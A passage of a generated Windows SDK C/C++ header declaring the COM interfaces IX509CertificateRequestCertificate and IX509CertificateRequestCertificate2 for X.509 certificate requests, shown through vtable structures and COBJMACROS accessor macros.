    ( (This)->lpVtbl -> get_CspInformations(This,ppValue) ) 

#define IX509CertificateRequestCertificate_put_CspInformations(This,pValue)	\
    ( (This)->lpVtbl -> put_CspInformations(This,pValue) ) 

#define IX509CertificateRequestCertificate_get_HashAlgorithm(This,ppValue)	\
    ( (This)->lpVtbl -> get_HashAlgorithm(This,ppValue) ) 

#define IX509CertificateRequestCertificate_put_HashAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> put_HashAlgorithm(This,pValue) ) 

#define IX509CertificateRequestCertificate_get_AlternateSignatureAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> get_AlternateSignatureAlgorithm(This,pValue) ) 

#define IX509CertificateRequestCertificate_put_AlternateSignatureAlgorithm(This,Value)	\
    ( (This)->lpVtbl -> put_AlternateSignatureAlgorithm(This,Value) ) 

#define IX509CertificateRequestCertificate_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 


#define IX509CertificateRequestCertificate_InitializeFromTemplateName(This,Context,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromTemplateName(This,Context,strTemplateName) ) 

#define IX509CertificateRequestCertificate_InitializeFromPrivateKey(This,Context,pPrivateKey,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromPrivateKey(This,Context,pPrivateKey,strTemplateName) ) 

#define IX509CertificateRequestCertificate_InitializeFromPublicKey(This,Context,pPublicKey,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromPublicKey(This,Context,pPublicKey,strTemplateName) ) 

#define IX509CertificateRequestCertificate_InitializeFromCertificate(This,Context,strCertificate,Encoding,InheritOptions)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,Context,strCertificate,Encoding,InheritOptions) ) 

#define IX509CertificateRequestCertificate_InitializeDecode(This,strEncodedData,Encoding)	\
    ( (This)->lpVtbl -> InitializeDecode(This,strEncodedData,Encoding) ) 

#define IX509CertificateRequestCertificate_CheckSignature(This,AllowedSignatureTypes)	\
    ( (This)->lpVtbl -> CheckSignature(This,AllowedSignatureTypes) ) 

#define IX509CertificateRequestCertificate_IsSmartCard(This,pValue)	\
    ( (This)->lpVtbl -> IsSmartCard(This,pValue) ) 

#define IX509CertificateRequestCertificate_get_TemplateObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_TemplateObjectId(This,ppValue) ) 

#define IX509CertificateRequestCertificate_get_PublicKey(This,ppValue)	\
    ( (This)->lpVtbl -> get_PublicKey(This,ppValue) ) 

#define IX509CertificateRequestCertificate_get_PrivateKey(This,ppValue)	\
    ( (This)->lpVtbl -> get_PrivateKey(This,ppValue) ) 

#define IX509CertificateRequestCertificate_get_NullSigned(This,pValue)	\
    ( (This)->lpVtbl -> get_NullSigned(This,pValue) ) 

#define IX509CertificateRequestCertificate_get_ReuseKey(This,pValue)	\
    ( (This)->lpVtbl -> get_ReuseKey(This,pValue) ) 

#define IX509CertificateRequestCertificate_get_OldCertificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_OldCertificate(This,Encoding,pValue) ) 

#define IX509CertificateRequestCertificate_get_Subject(This,ppValue)	\
    ( (This)->lpVtbl -> get_Subject(This,ppValue) ) 

#define IX509CertificateRequestCertificate_put_Subject(This,pValue)	\
    ( (This)->lpVtbl -> put_Subject(This,pValue) ) 

#define IX509CertificateRequestCertificate_get_CspStatuses(This,ppValue)	\
    ( (This)->lpVtbl -> get_CspStatuses(This,ppValue) ) 

#define IX509CertificateRequestCertificate_get_SmimeCapabilities(This,pValue)	\
    ( (This)->lpVtbl -> get_SmimeCapabilities(This,pValue) ) 

#define IX509CertificateRequestCertificate_put_SmimeCapabilities(This,Value)	\
    ( (This)->lpVtbl -> put_SmimeCapabilities(This,Value) ) 

#define IX509CertificateRequestCertificate_get_SignatureInformation(This,ppValue)	\
    ( (This)->lpVtbl -> get_SignatureInformation(This,ppValue) ) 

#define IX509CertificateRequestCertificate_get_KeyContainerNamePrefix(This,pValue)	\
    ( (This)->lpVtbl -> get_KeyContainerNamePrefix(This,pValue) ) 

#define IX509CertificateRequestCertificate_put_KeyContainerNamePrefix(This,Value)	\
    ( (This)->lpVtbl -> put_KeyContainerNamePrefix(This,Value) ) 

#define IX509CertificateRequestCertificate_get_CryptAttributes(This,ppValue)	\
    ( (This)->lpVtbl -> get_CryptAttributes(This,ppValue) ) 

#define IX509CertificateRequestCertificate_get_X509Extensions(This,ppValue)	\
    ( (This)->lpVtbl -> get_X509Extensions(This,ppValue) ) 

#define IX509CertificateRequestCertificate_get_CriticalExtensions(This,ppValue)	\
    ( (This)->lpVtbl -> get_CriticalExtensions(This,ppValue) ) 

#define IX509CertificateRequestCertificate_get_SuppressOids(This,ppValue)	\
    ( (This)->lpVtbl -> get_SuppressOids(This,ppValue) ) 

#define IX509CertificateRequestCertificate_get_RawDataToBeSigned(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawDataToBeSigned(This,Encoding,pValue) ) 

#define IX509CertificateRequestCertificate_get_Signature(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_Signature(This,Encoding,pValue) ) 

#define IX509CertificateRequestCertificate_GetCspStatuses(This,KeySpec,ppCspStatuses)	\
    ( (This)->lpVtbl -> GetCspStatuses(This,KeySpec,ppCspStatuses) ) 


#define IX509CertificateRequestCertificate_CheckPublicKeySignature(This,pPublicKey)	\
    ( (This)->lpVtbl -> CheckPublicKeySignature(This,pPublicKey) ) 

#define IX509CertificateRequestCertificate_get_Issuer(This,ppValue)	\
    ( (This)->lpVtbl -> get_Issuer(This,ppValue) ) 

#define IX509CertificateRequestCertificate_put_Issuer(This,pValue)	\
    ( (This)->lpVtbl -> put_Issuer(This,pValue) ) 

#define IX509CertificateRequestCertificate_get_NotBefore(This,pValue)	\
    ( (This)->lpVtbl -> get_NotBefore(This,pValue) ) 

#define IX509CertificateRequestCertificate_put_NotBefore(This,Value)	\
    ( (This)->lpVtbl -> put_NotBefore(This,Value) ) 

#define IX509CertificateRequestCertificate_get_NotAfter(This,pValue)	\
    ( (This)->lpVtbl -> get_NotAfter(This,pValue) ) 

#define IX509CertificateRequestCertificate_put_NotAfter(This,Value)	\
    ( (This)->lpVtbl -> put_NotAfter(This,Value) ) 

#define IX509CertificateRequestCertificate_get_SerialNumber(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_SerialNumber(This,Encoding,pValue) ) 

#define IX509CertificateRequestCertificate_put_SerialNumber(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_SerialNumber(This,Encoding,Value) ) 

#define IX509CertificateRequestCertificate_get_SignerCertificate(This,ppValue)	\
    ( (This)->lpVtbl -> get_SignerCertificate(This,ppValue) ) 

#define IX509CertificateRequestCertificate_put_SignerCertificate(This,pValue)	\
    ( (This)->lpVtbl -> put_SignerCertificate(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509CertificateRequestCertificate_INTERFACE_DEFINED__ */


#ifndef __IX509CertificateRequestCertificate2_INTERFACE_DEFINED__
#define __IX509CertificateRequestCertificate2_INTERFACE_DEFINED__

/* interface IX509CertificateRequestCertificate2 */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509CertificateRequestCertificate2;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab35a-217d-11da-b2a4-000e7bbb2b09")
    IX509CertificateRequestCertificate2 : public IX509CertificateRequestCertificate
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeFromTemplate( 
            /* [in] */ X509CertificateEnrollmentContext context,
            /* [in] */ __RPC__in_opt IX509EnrollmentPolicyServer *pPolicyServer,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeFromPrivateKeyTemplate( 
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in_opt IX509PrivateKey *pPrivateKey,
            /* [in] */ __RPC__in_opt IX509EnrollmentPolicyServer *pPolicyServer,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_PolicyServer( 
            /* [retval][out] */ __RPC__deref_out_opt IX509EnrollmentPolicyServer **ppPolicyServer) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Template( 
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateTemplate **ppTemplate) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct IX509CertificateRequestCertificate2Vtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509CertificateRequestCertificate2 * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509CertificateRequestCertificate2 * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509CertificateRequestCertificate2 * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ X509CertificateEnrollmentContext Context);
        
        HRESULT ( STDMETHODCALLTYPE *Encode )( 
            __RPC__in IX509CertificateRequestCertificate2 * This);
        
        HRESULT ( STDMETHODCALLTYPE *ResetForEncode )( 
            __RPC__in IX509CertificateRequestCertificate2 * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetInnerRequest )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ InnerRequestLevel Level,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateRequest **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Type )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__out X509RequestType *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EnrollmentContext )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__out X509CertificateEnrollmentContext *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Silent )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Silent )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ParentWindow )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ParentWindow )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ LONG Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_UIContextMessage )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_UIContextMessage )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SuppressDefaults )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_SuppressDefaults )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RenewalCertificate )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_RenewalCertificate )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ClientId )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__out RequestClientInfoClientId *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_ClientId )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ RequestClientInfoClientId Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CspInformations )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__deref_out_opt ICspInformations **ppValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_CspInformations )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ __RPC__in_opt ICspInformations *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_HashAlgorithm )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_HashAlgorithm )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ __RPC__in_opt IObjectId *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_AlternateSignatureAlgorithm )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_AlternateSignatureAlgorithm )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromTemplateName )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *InitializeFromPrivateKey )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in_opt IX509PrivateKey *pPrivateKey,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromPublicKey )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in_opt IX509PublicKey *pPublicKey,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strCertificate,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [defaultvalue][in] */ X509RequestInheritOptions InheritOptions);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ __RPC__in BSTR strEncodedData,
            /* [defaultvalue][in] */ EncodingType Encoding);
        
        HRESULT ( STDMETHODCALLTYPE *CheckSignature )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [defaultvalue][in] */ Pkcs10AllowedSignatureTypes AllowedSignatureTypes);
        
        HRESULT ( STDMETHODCALLTYPE *IsSmartCard )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_TemplateObjectId )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PublicKey )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509PublicKey **ppValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_PrivateKey )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509PrivateKey **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_NullSigned )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ReuseKey )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_OldCertificate )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Subject )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX500DistinguishedName **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_Subject )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ __RPC__in_opt IX500DistinguishedName *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CspStatuses )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatuses **ppValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_SmimeCapabilities )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_SmimeCapabilities )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SignatureInformation )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509SignatureInformation **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_KeyContainerNamePrefix )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_KeyContainerNamePrefix )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CryptAttributes )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__deref_out_opt ICryptAttributes **ppValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_X509Extensions )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509Extensions **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CriticalExtensions )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SuppressOids )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawDataToBeSigned )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Signature )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetCspStatuses )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ X509KeySpec KeySpec,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatuses **ppCspStatuses);
        
        HRESULT ( STDMETHODCALLTYPE *CheckPublicKeySignature )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ __RPC__in_opt IX509PublicKey *pPublicKey);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Issuer )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX500DistinguishedName **ppValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Issuer )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ __RPC__in_opt IX500DistinguishedName *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_NotBefore )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__out DATE *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_NotBefore )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ DATE Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_NotAfter )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__out DATE *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_NotAfter )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ DATE Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SerialNumber )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_SerialNumber )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SignerCertificate )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__deref_out_opt ISignerCertificate **ppValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_SignerCertificate )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ __RPC__in_opt ISignerCertificate *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromTemplate )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ X509CertificateEnrollmentContext context,
            /* [in] */ __RPC__in_opt IX509EnrollmentPolicyServer *pPolicyServer,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromPrivateKeyTemplate )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in_opt IX509PrivateKey *pPrivateKey,
            /* [in] */ __RPC__in_opt IX509EnrollmentPolicyServer *pPolicyServer,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PolicyServer )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509EnrollmentPolicyServer **ppPolicyServer);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Template )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateTemplate **ppTemplate);
        
        END_INTERFACE
    } IX509CertificateRequestCertificate2Vtbl;

    interface IX509CertificateRequestCertificate2
    {
        CONST_VTBL struct IX509CertificateRequestCertificate2Vtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509CertificateRequestCertificate2_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509CertificateRequestCertificate2_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509CertificateRequestCertificate2_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509CertificateRequestCertificate2_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509CertificateRequestCertificate2_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509CertificateRequestCertificate2_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509CertificateRequestCertificate2_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509CertificateRequestCertificate2_Initialize(This,Context)	\
    ( (This)->lpVtbl -> Initialize(This,Context) ) 

#define IX509CertificateRequestCertificate2_Encode(This)	\
    ( (This)->lpVtbl -> Encode(This) ) 

#define IX509CertificateRequestCertificate2_ResetForEncode(This)	\
    ( (This)->lpVtbl -> ResetForEncode(This) ) 

#define IX509CertificateRequestCertificate2_GetInnerRequest(This,Level,ppValue)	\
    ( (This)->lpVtbl -> GetInnerRequest(This,Level,ppValue) ) 

#define IX509CertificateRequestCertificate2_get_Type(This,pValue)	\
    ( (This)->lpVtbl -> get_Type(This,pValue) ) 

#define IX509CertificateRequestCertificate2_get_EnrollmentContext(This,pValue)	\
    ( (This)->lpVtbl -> get_EnrollmentContext(This,pValue) ) 

#define IX509CertificateRequestCertificate2_get_Silent(This,pValue)	\
    ( (This)->lpVtbl -> get_Silent(This,pValue) ) 

#define IX509CertificateRequestCertificate2_put_Silent(This,Value)	\
    ( (This)->lpVtbl -> put_Silent(This,Value) ) 

#define IX509CertificateRequestCertificate2_get_ParentWindow(This,pValue)	\
    ( (This)->lpVtbl -> get_ParentWindow(This,pValue) ) 

#define IX509CertificateRequestCertificate2_put_ParentWindow(This,Value)	\
    ( (This)->lpVtbl -> put_ParentWindow(This,Value) ) 

#define IX509CertificateRequestCertificate2_get_UIContextMessage(This,pValue)	\
    ( (This)->lpVtbl -> get_UIContextMessage(This,pValue) ) 

#define IX509CertificateRequestCertificate2_put_UIContextMessage(This,Value)	\
    ( (This)->lpVtbl -> put_UIContextMessage(This,Value) ) 

#define IX509CertificateRequestCertificate2_get_SuppressDefaults(This,pValue)	\
    ( (This)->lpVtbl -> get_SuppressDefaults(This,pValue) ) 

#define IX509CertificateRequestCertificate2_put_SuppressDefaults(This,Value)	\
    ( (This)->lpVtbl -> put_SuppressDefaults(This,Value) ) 

#define IX509CertificateRequestCertificate2_get_RenewalCertificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RenewalCertificate(This,Encoding,pValue) ) 

#define IX509CertificateRequestCertificate2_put_RenewalCertificate(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_RenewalCertificate(This,Encoding,Value) ) 

#define IX509CertificateRequestCertificate2_get_ClientId(This,pValue)	\
    ( (This)->lpVtbl -> get_ClientId(This,pValue) ) 

#define IX509CertificateRequestCertificate2_put_ClientId(This,Value)	\
    ( (This)->lpVtbl -> put_ClientId(This,Value) ) 

#define IX509CertificateRequestCertificate2_get_CspInformations(This,ppValue)	\
    ( (This)->lpVtbl -> get_CspInformations(This,ppValue) ) 

#define IX509CertificateRequestCertificate2_put_CspInformations(This,pValue)	\
    ( (This)->lpVtbl -> put_CspInformations(This,pValue) ) 

#define IX509CertificateRequestCertificate2_get_HashAlgorithm(This,ppValue)	\
    ( (This)->lpVtbl -> get_HashAlgorithm(This,ppValue) ) 

#define IX509CertificateRequestCertificate2_put_HashAlgorithm(This,pValue)	\
